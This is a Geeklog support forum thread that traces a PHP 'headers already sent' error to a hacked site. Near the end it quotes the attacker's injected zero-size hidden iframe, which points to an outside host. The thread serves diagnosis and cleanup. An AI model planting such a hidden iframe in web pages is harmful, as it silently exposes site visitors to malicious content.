Welcome to Geeklog, Anonymous Thursday, March 28 2024 @ 07:06 pm EDT

Geeklog Forums

Help Header problem


BILLSTACJESS

Anonymous
stressed
Please help with this message. I do not know where to begin to fix it. Warning: Cannot modify header information - headers already sent by (output started at /web/sites/home/emgames/config/everydaymath/template_kids.inc:44) in /web/sites/home/emgames/config/everydaymath/playactivity.inc on line 47 I do not know where to go to fix this problem. It is a secure website that my daughter goes on to play math games. Thanks, Billstacjess
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Well, this doesn't look like it has anything to do with Geeklog, so I'd suggest you contact whoever wrote that script or runs that site ...

Incidentally, this is also something that happens to Geeklog users on occasion, so maybe this FAQ entry will help: Cannot modify header information - headers already sent by ...

bye, Dirk
 Quote

Status: offline

nikebound

Forum User
Junior
Registered: 11/04/07
Posts: 15
Quote by: BILLSTACJESS

Please help with this message. I do not know where to begin to fix it.

Warning: Cannot modify header information - headers already sent by (output started at /web/sites/home/emgames/config/everydaymath/template_kids.inc:44) in /web/sites/home/emgames/config/everydaymath/playactivity.inc on line 47


I do not know where to go to fix this problem. It is a secure website that my daughter goes on to play math games.

Thanks,
Billstacjess



We're not going to be able to help you directly. What I can tell you is the cause of the error.
When PHP pushes out a web page, it prints everything not inside the brackets
Text Formatted Code
<? [blah blah blah] ?>
interspersed with all the code inside the brackets.
If one of the files that makes up the page has a blank line before or after those brackets and before the PHP header command, it will push out default headers followed by the blank line, and then try to push out the actual headers.
So Dirk's short answer is correct - we can't help you.
The longer answer is that it's not a hard problem for the webmaster of the site to fix.
 Quote

Lex

Anonymous
I just ran into this error for the first time today. I haven't touched the GL code in a long time. When I log into the site, it shows that I am logged in but treats me as if I am not logged.

I tried looking for whitespaces on the document/line that reports the error. But there are none. Deleted cookies, etc. Other site users are reporting this problem as wel. Running version 1.4 of GL.

Any reason why this happened and how to solve it?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Lex

I tried looking for whitespaces on the document/line that reports the error. But there are none.


Pay attention to the "output started at" - that's where the whitespace is.

If you can't figure it out, post the complete message here.

bye, Dirk
 Quote

Lex

Anonymous
Yes, that's where I'm looking:

Text Formatted Code
Warning: Cannot modify header information - headers already sent by (output started at /homepages/19/d90628944/htdocs/club80s/config.php:198) in /homepages/19/d90628944/htdocs/club80s/lib-common.php on line 634


Line 198 on the config.php:
Text Formatted Code
// Choose any combination of the following (order here = order in the menu).
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Okay, that's in the middle of the file, so not the usual whitespace problem.

At a guess: Did you enclose the name of your default theme ($_CONF['theme'], a few lines before that) in quotes?

bye, Dirk
 Quote

Lex

Anonymous
Here is the line:
$_CONF['theme'] = 'gameserver'; // default theme

Is it supposed to be in quotes?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Yeah, it should be in quotes, so that's fine.

It was only a guess, since a missing quote could cause PHP to consider anything up to the next quote as being part of a string. And whatever comes after that quote may then be echoed out.

It's probably something like that elsewhere in your config.php. Since your site has apparently been hacked, you may want to start over with a fresh copy of config.php anyway, just in case ...

bye, Dirk
 Quote

Lex

Anonymous
So why did this all of a sudden show up?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
I'm wary when people tell me they "didn't to anything" :wink:

In this case, however, it's possible that the hacker modified and/or accidentally damaged the file. If they can upload files to your webspace, they can just as easily modify existing files.

So I'd suggest when you do the upgrade, you start over fresh as far as the files on your webspace are concerned. This may sound more scary than it is. Just keep a backup of the old files so that you can look things up if necessary. And don't forget to change the password on your admin account(s).

bye, Dirk
 Quote

Lex

Anonymous
Ok, I found the problem. Someone hacked it and added a line of text to both the config.php and the lib-common.php files which broke the site obviously. So they're smart enough to hack the site but too stupid to do it properly.

Text Formatted Code
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>


So, how were they able to add this line of text? Does the new update prevent this from happening?
 Quote

Lex

Anonymous
Also, it looks like they messed up the BaseAdmin.class.php for Spamx.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Lex

So, how were they able to add this line of text? Does the new update prevent this from happening?


Unfortunately, the bug in question enabled an attacker to run arbitrary code. So they were able to do pretty much anything. That hole has of course been closed and we've added additional checks to alert site owners of possible problems with their install.

bye, Dirk
 Quote

All times are EDT. The time is now 07:06 pm.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content